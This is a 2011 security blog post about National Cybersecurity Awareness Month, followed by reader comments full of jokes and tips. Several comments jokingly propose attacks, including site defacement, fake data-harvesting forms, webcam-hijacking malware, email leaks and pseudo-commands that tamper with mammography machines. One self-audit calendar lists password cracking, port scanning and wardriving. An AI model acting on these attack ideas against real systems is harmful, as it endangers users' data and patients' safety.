Schneier on Security
A blog covering security and security technology.
« Isaac Asimov on Security Theater |
| Security Cartoon »
October 4, 2011
National Cybersecurity Awareness Month
October is National Cybersecurity Awareness Month, sponsored by the Department of Homeland Security. The website has some sample things you can do to celebrate, but they're all pretty boring. Surely we can do better. Post your suggestions in comments.
Posted on October 4, 2011 at 6:31 AM
• 49 Comments
To receive these entries once a month by e-mail, sign up for the Crypto-Gram Newsletter.
Hack a government website and replace the frontpage with the message: "Happy sibursekurity monht! No UFO information here."
Hack the "National Cybersecurity Awareness Month" website and add a check-your-password-strength and a see-if-your-creditcard-is-stolen module. All entered information is of course 'handled confidentially'. :)
Bad thing is that it takes some attention away from the fact that October has been National Breast Cancer Awareness Month last 25 years. People with short and narrow attention span cannot concentrate both.
I will disconnect all my desktops and laptops from ethernet/ wifi and delete the GPRS config on my phone for the whole month to ensure that I fulfill my role in securing cyberspace...
Hand out bottles of Mezcal with a worm in it to celebrate all the people who prevent internet worms from propagating.
As you can see I definitely will be preventing "internet worms from propagating" (as per my comment immediately above yours)...
So where's my bottle?
@Nano: Hack the "National Cybersecurity Awareness Month" website and add information about breast cancer.
It's also breast cancer hysteria month. Looks like DHS/TSA celebrated that enough this week what with forcing a titrot survivor to have her scars groped and examined in public. Jesse Ventura's lawsuit is going nowhere; she doesn't stand a chance. Okay, I'll make an extra backup of data, go store it offsite.
@Nano: I think nobody really knows what "awareness month" any given month is as they're trivial and serve virtually no purpose. For breast cancer, AIDS, cyber-security and virtually everything else, there should be constant awareness not just for a given period of time; it's almost as if it's intended to be a joke.
Why are "awareness" months and other such garbage a joke? Well, what else is October?
It's also ...
Adopt a Shelter Dog Month
American Pharmacist Month
Apple Jack Month
Breast Cancer Awareness Month
Clergy Appreciation Month
Computer Learning Month
Domestic Violence Awareness Month
Eat Country Ham Month
International Drum Month
Lupus Awareness Month
National Diabetes Month
National Pizza Month
National Vegetarian Month
National Popcorn Popping Month
National Fire Safety & Prevention Month
National Reading Group Month
... and probably other stupid stuff.
BTW, my idea to celebrate this very important awareness issue for the month is to throw a pizza party with breast cancer survivors and show them how to set a proper password for their pharmacy website.
"The website has some sample things you can do to to celebrate, but they're al pretty boring."
Of course they are boring for two important reasons,
1, You must not cause the sheeple to get excited in any way, they might panic and start thinking.
2, This is the Department of Hapless Stupidity who's two strengths are "we haven't a clue" and "we are the world's largest bureaucracy".
Any way how about a song to celebrate?
As Louis Armstrong once sang (Sit down, you're Rocking the Boat),
I dreamed last night I got on the boat to Heaven,
And by some chance I had brought my dice along,
And there I stood, and I hollered, "Someone fade me",
But the passengers they knew right from wrong
For the people all said"Sit down, sit down you're rockin' the boat.
And the people all said"Sit down, sit down you're rockin' the boat"
And the devil will drag you under By the sharp lapel of your checkered coat,
Sit down, sit down Sit down you're rocking the boat....
"Bad thing is that it takes some attention away from the fact that October has been National Breast Cancer Awareness Month last 25 years. People with short and narrow attention span cannot concentrate both."
And breast cancer awareness will save a lot more lives.
They should teach crypto to the general public.
Symmetric, asymmetric, convergent encryption (just read about Bitcasa ;), web of trust, steganography, RSA blinding, zero knowledge protocols, etc...
It's more fun than most people think!
Put some demonstration cross site scripting attacks and malware downloads that will post content to Facebook, transfer $1 to breast cancer funds, and take pictures with their webcam and email it back to them. That should make people uncomfortably aware of how vulnerable they are. And the record donations for breast cancer will provide accurate statistics on how many got infected by the malware.
Celebrate like Jack Bauer!
Don't wear a bra. Encrypt your shirt.
A demonstration hack like the one described by @Gabriel would be like fluxnet.
Teaching cryptography and security-concepts sounds reasonable, like easy-and-yet-secure password chosing (eg four random common words), basics like ROT13 and so on, can be fun.
In Germany there are theme years and days: 2006 was the year of computer science :) Yesterday was German-Unity-Day, hurra!
53qdy 6974 i8ew gqw8d d60y34w:
Actually I go and talk with school kids about technology safety. Not just the short-term stuff like not telling complete strangers you are alone at home, but the longer term things that can impact your carrier. Plausibly not what the creepy-named DHS had in mind, but safety is security.
Why should we celebrate or contribute?
There's obviously a huge marketing budget available to DHS. So, the marketing/consulting firm responsible for inventing the cyber-BS-awareness-month should celebrate: without any contribution to society they managed (most likely) to extract a fortune form the general public while giving DHS officials this special feeling of importance, relevance, and greatness.
[which, on some level, implies that the work of people sub-contracting in the DHS is close to the work of psychologists ... keeping this warm, comfy feeling alive for those in demand]
Good to hear it is Sarcastic Month. I shall try my upmost to uphold the sanctity of such an important event. I believe it will also improve my Cybersecurity Awareness substantially.
And a happy 10-4 day to everybody too!
@ Joe Dietz,
"Plausibly not what the creepy-named DHS had in mind, but safety is security"
In some European languages (french for instance" they do not have seperate words for "safety" and "security".
@ Roger that,
Silly programer trivia...
In the UK dates are given as dd/mm/yy the first of Oct this year was the same as 1 2 3 in binary (01/10/11)
Como también es el mes "hispánico" (oficialmente el mes "hispano" empieza el día
15 de septiembre, pero, bueno, ocupa parte del mes de octubre) se
podría combinar con algo como "adoptemos un 'hispano' en Alabama".
@AC2 - except, you clearly haven't followed through...
These things always remind me of National Brotherhood Week
National Cybersecurity Awareness Month activity-a-day calendar
Day 1. google your own name
Day 2. google all your email addresses
Day 3. google all your telephone numbers
Day 4. google map your residence. Also check streetview. When did they take those pictures?
Day 5. Make a list of all your on-line accounts
Day 6. List the passwords for your accounts. How many accounts share the same password?
Day 7. Find your browser cache. Take a look. See what is there.
Day 8. Find out how to clear your browser history/cache/cookies
Day 9. Find all the cookies on your web browser. How many of the domain names do you recognize?
Day 10. Clear all the cookies on your web browser. Check back every day. How long does it take for them to return?
Day 11. Set your browser to refuse all cookies. Try to browse the web.
Day 13. Pick an account or service that you no longer use/need. Try to close/delete/eradicate it.
Day 14. Lower your attack profile. Pick a high-profile app (IE/Outlook/Acrobat/etc..) and switch to a lower-profile equivalent (FF/Thunderbird/Foxit/etc...)
Day 15. Find the number of people killed each year by computers. Compare with the number killed by automobiles.
Day 16. Locate all the executable programs on your computer.
Day 17. List all the vendors that those programs came from.
Day 18. List all the countries that those programs came from.
Day 19. Find a work that isn't under copyright. Copy it.
Day 20. Enter a bill into wheresgeorge.com. Release it into the wild and track it on-line.
Day 21. Create an email address somewhere. Never use it. See how much SPAM it accumulates.
Day 22. Do a tracepath to your favorite site or service. How many machines get their hands on your data between here and there?
Day 23. Connect a machine with a common OS to the internet. Measure mean time to compromise.
Day 24. Run crack against all your encrypted passwords
Day 25. Run a port scan on your own IP address
Day 26. Do a security audit of your own computer
Day 27. Walk a tablet/netbook/PDA around your wireless access point and map its range
Day 28. Go wardriving with a friend. How many wireless access points can you find? How many are unsecured?
Day 29. Scavenge some drives from the $5 bin at your local computer surplus store. Plug them in. See what is on them.
Day 30. Read Ken Thompson--Reflections on Trusting Trust. Do you understand the attack? Do you care?
Day 31. (Halloween) Create an on-line identity that isn't publicly tied to your real name. Masquerade on-line in that persona.
To be taken about as seriously as an ad for Hyacinth Bucket's famous candle light suppers: a non-event meant to distract people from stuff that actually matters. Like Amanda Knox. Or the trial of MJ's little propofol helper.
If the DHS were to be concerned in any way about raising citizens awareness to what's really happening in the country, they'd be reporting about #OccupyWallStreet .
"Day 1. google your own name
Day 2. google all your email addresses
Day 3. google all your telephone numbers
Day 4. google map your residence. Also check streetview. When did they take those pictures?"
And this is in order to make sure Google knows who you are, where you live and how to contact you? :)
Re: Day 4
And keep that vehicle in the garage with the garage door closed so Google, and the rest of the world, doesn't know what kind of vehicle you drive.
Honestly, the only way to celebrate National Cybersecurity Awareness Month would be to dismantle the Department of Homeland Security and the Transportation Security Administration and spend some of the money saved on better intelligence to prevent attacks, reduce security levels back to pre-9/11 levels, and have security response teams ready to react to threats and emergencies instead.
This way people could go to the airport again without being molested and there belongings being stolen. Another additional benefit would be that the sponsor for this month long event would be eliminated and give attention back to something that is a higher risk to individuals and more important like Breast Cancer Awareness.
@Steven: Trusting Trust, that's always been one of my favorites. And where trusted computing falls flat, especially at the consumer level, such as microsoft's "secure boot" in win 8. To begin with, you have to trust your mobo maker, UEFI writer, and Microsoft. The first two are the weakest links.
Break in to google, then have a bot find the most embarrasing email in each account and forward it to all the user's contacts; if it can't find one, it makes one up. Have the bot run on compromised ec2 accounts so that it's 'web scale'. It could make loads of people aware of security in just a few hours.
Odd. It's the same month in Canada...
@Clive Robinson: Perhaps most amusing is that Czech has no word for "safety," instead the only formulation for that concept is "not dangerous."
I've just got an email from Amazon Web Services, which celebrates the event quite well.
The email's topic announced a "Server Side Encryption" sub-service for their cloud-based data storage service named S3 (I use it for backups - encrypting on MY side of course). Nonsense, I thought at first. If I hand them my plaintext data for encryption on their side - it's nonsense because they have already seen the plaintext, so I have to trust them not to reveal it anyway, regardless of the fact if they store it encrypted or not. If I hand them data encrypted by me - it's useless.
Reading on, I had a good laugh. To enable the feature you just have to "set the “Use Server Side Encryption” checkbox property" in the web console or enable encryption "simply by adding an additional request header" (checking the dev guide: the header specifies the encryption algorithm only and not the key). The new service "employs strong multi-factor [sic!] encryption" and each file is "encrypted with a unique key" which "is itself encrypted with a regularly rotated master key". For now, they offer AES-256 only. Security theater indeed.
Reading further on I realized that AWS guys aren't really that dumb, only cynical - they just try hard to sell ther stuff to "customers seeking to comply with certain regulations such as PCI and HIPAA". The use of buzzwords out of context confirms that. This is *literally* the checklist-type security mocked so many times on this blog by security auditing practitioners.
Hmmm...Breast Cancer Awareness month AND Cybersecurity Awareness Month? Maybe there's some way to connect breasts and the cyber world. Let me think about this...
@Munchma Qutchi: Latest news! Computer viruses can cause breast cancer!
How about an attack on networked digital mammography machines to blend the awareness months? Something like
SET #Plate_Pressure as %MAX
SET #Scan_Time as 2.0 hours
might get some attention.
According to today's "Blondie" comic, October is also "Cookie Month". I know which month I will be celebrating ...
Why is Cybersecurity month in October? Because it's Federal budget season in Congress.
its also celiac awareness month, so write some new sigs for your ips to drop connections containing the wheat, barley, rye and sometimes oats.
NOTE: The following ideas for cyber security (if there truly is any such thing) may be considered electronic blasphemy by the First Deformed Church of Science (Fiction), as well as most of the sheeple in the mainstream.
Besides the most obvious of using a good-quality (automatically excludes McAfee and Symantec) antiviral package on your system, AND keeping it up to date, I present what I think may be the Seven Habits of Highly Successful Tech Users.
(1) Don't use Internet Explorer. Period.
(2) Use Firefox. Install AdBlock Plus, NoScript, BetterPrivacy, and FlashBlock. THINK before you allow a script to execute.
(3) Don't participate in "social networking." Facebook, MySpace, and the others are nothing more than enormous time-sucks and information sinkholes.
(4) Learn how to use personal social skills instead. Learn how to 'read' people (yeah, I know... scary, but well worth it!)
(5) A little paranoia is always Good Thing.
(6) "Smart" phones are anything but. You have the smarts. The phone is merely a computer, and just as much a potential security leak as your desktop or laptop. Treat it as such!
And, what I think may be the hardest one of all for many...
(7) Your brain, and the critical thinking it can provide if properly used, are the best possible security tools you have. Learn how to use them!
In other words: Don't be stupid. ;-)
Mr. Bruce/KC7GR, your suggestions sound generally valid. However, one quibble is that I would NOT recommend you use the "FlashBlock" extension. Now that NoScript has implemented a far more secure form of flash blocking functionality, there is no reason to use FlashBlock--the method it uses to deny flash unless enabled is intended for annoyance blocking, not security, and can be exploited rather easily, unlike rapidly updated and extremely secure NoScript. FlashBlock is worse than useless for security, as simply having it installed increases one's attack surface if it develops any vulnerabilities. See the article here: http://hackademix.net/2008/06/08/block-rick/ Warning: If you use Flashblock as your flash blocker, you are about to see ole' Rick do his rolling.
I use the following privacy/security extensions on FF6/7 running on Mac, Windows, and Linux (FYI--If you have to pick only one, then get NoScript and LastPass (yes, that's two, but between those two you can't go wrong)).
To make most effective use of these, always patch your browser and addons frequently, use permanent private browsing mode, and disable any plugins or functionality you don't need (ie Java, RealPlayer, Silverlight, etc). I recommend you always leave these off, but QuickJava (below) makes it easy to toggle them.
Thus (top category picks bolded, top 2 overall underlined):
Malicious Site/Link Protection:
• AVG LinkScanner
• Link Alert
Web Site Security:
• HTTPS Everywhere
• Gmail S/MIME
• MD5 Reborned Hasher
Cross Site Request Security
• Redirect Remover
• ABP w/EasyList+Privacy, and Fanboy's with P2P, Tracking, Stats, Object Dimensions, and Annoyance blocking
• ABP Popup Addon
• Beef TACO
I use all of them every day on Mac, Windows, and Linux without major web browsing troubles. Of course, the safest solution is to run FF with those extensions in a Linux virtual machine, like I do, and only download things in your real browser once you have downloaded and verified their integrity in Linux.
Those are just some suggestions, and adding such browser extensions is only a partial defense against one attack vector. However, it will stop a fairly hefty percentage of web-based attacks in their tracks. Happy browsing, folks, and good luck out there...trust me, without a comprehensive security plan, you WILL need it.
I just visited stayingsafeonline.org to view their tips and found they have a blog post stating, in part:
On October 10th National Cyber Security Alliance discovered that staysafeonline.org had become the victim of a malicious iframe injection resulting in malicious content potentially being delivered to visitors to the website.
If you visited staysafeonline.org between October 5 – 11 there is a chance that your system may have been exposed to malicious content.
Filtering posts for IFRAMES is pretty standard stuff...
@Steven - thanks for the great list. I'm "borrowing" it, with a few minor tweaks, for the cyber safety class I teach to kids. I hope you don't mind.
Schneier.com is a personal website. Opinions expressed are not necessarily those of BT.